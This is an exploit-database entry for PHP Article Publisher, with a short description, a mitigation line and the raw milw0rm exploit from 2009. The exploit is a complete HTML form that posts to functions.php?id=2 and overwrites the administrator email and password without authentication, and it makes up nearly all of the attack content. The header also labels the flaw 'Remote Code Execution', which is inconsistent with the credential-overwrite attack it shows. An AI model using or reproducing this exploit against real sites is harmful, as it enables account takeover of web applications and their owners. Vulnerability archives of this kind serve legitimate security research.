remote change password and add admin xpl

vendor:

PHP Article Publisher

by:

ahmadbady

8,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: PHP Article Publisher

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

remote change password and add admin xpl

This exploit allows an attacker to remotely change the password and add an admin user to the PHP Article Publisher application. The exploit is triggered by sending a POST request to the functions.php page with the id parameter set to 2. The attacker can then set the email and password fields to the desired values.

Mitigation:

The application should validate user input and restrict access to the functions.php page.

Source

Exploit-DB raw data:

                =-=-remote change password and add admin xpl-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script:php_article_publisher
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.graugon.com/publisher/download.html
--------------------------------------------------
--------------------------

change pass and add admin:


<form method='post' action='functions.php?id=2'>
<font class='font1'><b>coded by ahmadbady:</b></font>
<br><br>
<table width='100%' align='center' valign='top' cellpadding='0' cellspacing='2' border='0'>
<tr>
<td cellpadding='0' cellspacing='0'>
<font class='font1'>Directory Title</font>
</td>
<td cellpadding='0' cellspacing='0'>
<input type='text' size='22' name='title' value='PHP Article Publisher' class='edit'>
</td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'><font class='font1'><b>Login Details</b></font></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'>
<font class='font1'>Email</font>
</td>
<td cellpadding='0' cellspacing='0'>
<input type='text' size='22' name='email' value='' class='edit'>
</td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'>
<font class='font1'>Password</font>
</td>
<td cellpadding='0' cellspacing='0'>
<input type='text' size='22' name='password' value='111' class='edit'>
</td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'><br></td>
</tr>
<tr>
<td cellpadding='0' cellspacing='0'></td>
<td cellpadding='0' cellspacing='0'>
<input type='submit' value='Save Settings' class='submit'>
</td>
</tr>
</table>
</form>								

# milw0rm.com [2009-05-18]